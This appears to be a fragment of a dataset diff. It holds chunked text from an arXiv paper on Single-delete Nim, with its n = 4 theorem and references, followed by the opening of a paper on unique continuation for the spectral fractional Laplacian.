+ page_content='2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
371
+ page_content=' Further, we introduce a theorem for the case n = 4.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
372
+ page_content=' Theorem 6.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
373
+ page_content='3.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
374
+ page_content=' Denote by Ik(z) the k-th digit from the bottom of the binary representation of non-negative integer z.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
375
+ page_content=' For n = 4 in the Single-delete Nim position ⟨w, x, y, z⟩, let a = v2(w), b = v2(x), c = v2(y), d = v2(z).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
376
+ page_content=' If a ≤ b ≤ c ≤ d, ⟨w, x, y, z⟩ is a P-position if and only if a, b, c, and d satisfy one of the following conditions (1), (2), (3), (4), or (5).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
377
+ page_content=' (1) a = b = c = d.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
378
+ page_content=' (2) a < b = c = d and (2A) Id+1(w) = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
379
+ page_content=' 10 (3) a < b < c = d and the following conditions (3A)-(3C) are satisfied.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
380
+ page_content=' (3A) Id+1(w) = Id+1(x) = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
381
+ page_content=' (3B) Ik(w) + Ik(x) ≥ 1 for b + 2 ≤ k ≤ d.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
382
+ page_content=' (3C) Ib+1(w) = 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
383
+ page_content=' (4) a < b < c < d and the following conditions (4A)-(4E) are satisfied.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
384
+ page_content=' (4A) Id+1(w) = Id+1(x) = Id+1(y) = 0.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
385
+ page_content=' (4B) Ij(w) + Ij(x) + Ij(y) ≥ 2 for c + 2 ≤ j ≤ d.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
386
+ page_content=' (4C) Ic+1(w) = Ic+1(x) = 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
387
+ page_content=' (4D) Ik(w) + Ik(x) ≥ 1 for b + 2 ≤ k ≤ c.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
388
+ page_content=' (4E) Ib+1(w) = 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
389
+ page_content=' (5) a < b < c < d and the following conditions (5A)-(5F) are satisfied.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
390
+ page_content=' (5A) Ii(w) + Ii(x) + Ii(y) + Ii(z) ∈ {0, 3, 4} for i ≥ d + 2.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
391
+ page_content=' (5B) Id+1(w) = Id+1(x) = Id+1(y) = 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
392
+ page_content=' (5C) Ij(w) + Ij(x) + Ij(y) ≥ 2 for c + 2 ≤ j ≤ d.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
393
+ page_content=' (5D) Ic+1(w) = Ic+1(x) = 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
394
+ page_content=' (5E) Ik(w) + Ik(x) ≥ 1 for b + 2 ≤ k ≤ c.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
395
+ page_content=' (5F) Ib+1(w) = 1.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
396
+ page_content=' A proof of this theorem is shown in a Japanese report [6].' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
397
+ page_content=' This theorem solves only the case of n = 4, and the proof is long and complex, so we omit it.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
398
+ page_content=' Acknowledgements This work was partially supported by JSPS KAKENHI Grant Numbers JP21K12191 and JP22K13953.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
399
+ page_content=' References [1] Abuku, T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
400
+ page_content=', Sakai, K.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
401
+ page_content=', Shinoda, M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
402
+ page_content=' and Suetsugu,K.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
403
+ page_content=' : Determining the Winner of Split-and-delete Nim, The 27th Game Programming Work- shop, IPSJ, 17-24 (2022).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
404
+ page_content=' (In Japanese) 11 [2] Abuku, T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
405
+ page_content=' and Suetsugu, K.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
406
+ page_content=' : Delete Nim, Journal of Mathematics, Tokushima University 55, 75-81 (2021).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
407
+ page_content=' [3] Albert, M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
408
+ page_content='H.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
409
+ page_content=', Nowakousuki, R.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
410
+ page_content='J.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
411
+ page_content=' and Wolfe, D.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
412
+ page_content=' Lessons in Play: An Introduction to Combinatorial Game Theory (2nd ed.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
413
+ page_content=' ), A K Peters/CRC Press.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
414
+ page_content=' (2019) [4] Bouton, C.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
415
+ page_content='L.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
416
+ page_content=' : Nim, a Game with a Complete Mathematical Theory, Annals of Mathematics 3, 35-39 (1902).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
417
+ page_content=' [5] Sakai, K.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
418
+ page_content=' : Alice’s Adventure in Puzzle-Land Vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
419
+ page_content='4, Nikkei Science (2021).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
420
+ page_content=' (In Japanese) [6] Shinoda, M.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
421
+ page_content=' : Generalizations of Delete Nim Game and determining the winner, The Special Interest Group Technical Reports of IPSJ Vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
422
+ page_content='2022- GI-47, No.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
423
+ page_content='5.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
424
+ page_content=' 1-8 (2022).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
425
+ page_content=' (In Japanese) [7] Siegel, A.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
426
+ page_content='N.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
427
+ page_content=' : Combinatorial Game Theory, American Mathematical So- ciety (2013).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
428
+ page_content=' [8] Stankova Z.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
429
+ page_content=' and Rike T.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
430
+ page_content=' (eds.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
431
+ page_content=') : A Decade of the Berkeley Math Circle Vol.' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
432
+ page_content='1, Mathematical Circles Library, 159 (2008).' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
433
+ page_content=' 12' metadata={'source': '/home/zjlab/wf/langchain-ChatGLM/knowledge_base/WtFOT4oBgHgl3EQf7zTC/content/2301.12964v1.pdf'}
ZNFJT4oBgHgl3EQf7S0N/content/tmp_files/2301.11677v1.pdf.txt ADDED
@@ -0,0 +1,3531 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ arXiv:2301.11677v1 [math.AP] 27 Jan 2023
2
+ STRONG UNIQUE CONTINUATION FROM THE BOUNDARY
3
+ FOR THE SPECTRAL FRACTIONAL LAPLACIAN
4
+ ALESSANDRA DE LUCA, VERONICA FELLI, AND GIOVANNI SICLARI
5
+ Abstract. We investigate unique continuation properties and asymptotic behaviour at bound-
6
+ ary points for solutions to a class of elliptic equations involving the spectral fractional Laplacian.
7
+ An extension procedure leads us to study a degenerate or singular equation on a cylinder, with
8
+ a homogeneous Dirichlet boundary condition on the lateral surface and a non homogeneous
9
+ Neumann condition on the basis. For the extended problem, by an Almgren-type monotonicity
10
+ formula and a blow-up analysis, we classify the local asymptotic profiles at the edge where the
11
+ transition between boundary conditions occurs. Passing to traces, an analogous blow-up result
12
+ and its consequent strong unique continuation property is deduced for the nonlocal fractional
13
+ equation.
14
+ Keywords. Spectral fractional Laplacian; boundary behaviour of solutions; unique continuation;
15
+ monotonicity formula.
16
+ MSC classification. 35R11, 35B40, 31B25.
17
+ 1. Introduction and statement of the main results
18
+ In this paper we prove the strong unique continuation property and derive local asymptotics
19
+ from the boundary for the solutions to the following equation
20
+ (1)
21
+ (−∆)su = hu
22
+ on Ω,
23
+ where s ∈ (0, 1), Ω ⊆ RN is a bounded Lipschitz domain with N > 2s, h is a measurable function
24
+ on Ω satisfying suitable summability properties which will be more specifically clarified below (see
25
+ (7)) and (−∆)s is the so-called spectral fractional Laplacian.
26
+ The unique continuation property has been abundantly studied over the years for several prob-
27
+ lems. We recall that a family of functions, including the zero function, satisfies the strong unique
28
+ continuation property if the null function is the only one to have a zero of infinite order.
29
+ Several results are available in the literature about the spectral fractional Laplacian and its
30
+ interpretations. See [1], [18], and references therein for a detailed overview. We mention that
31
+ regularity properties for stationary equations are discussed in [14], while existence and uniqueness
32
+ results for evolution equations governed by the spectral fractional Laplacian are established in [3].
33
+ More closely related to the present paper are the results in [25], where a strong unique continuation
34
+ principle at nodal points is proved for fractional powers of some divergence-type elliptic operators,
35
+ including the case of the spectral fractional Laplacian. The techniques used in [25] are inspired
36
+ by those introduced in [11], which are based on a combination of a monotonicity formula for an
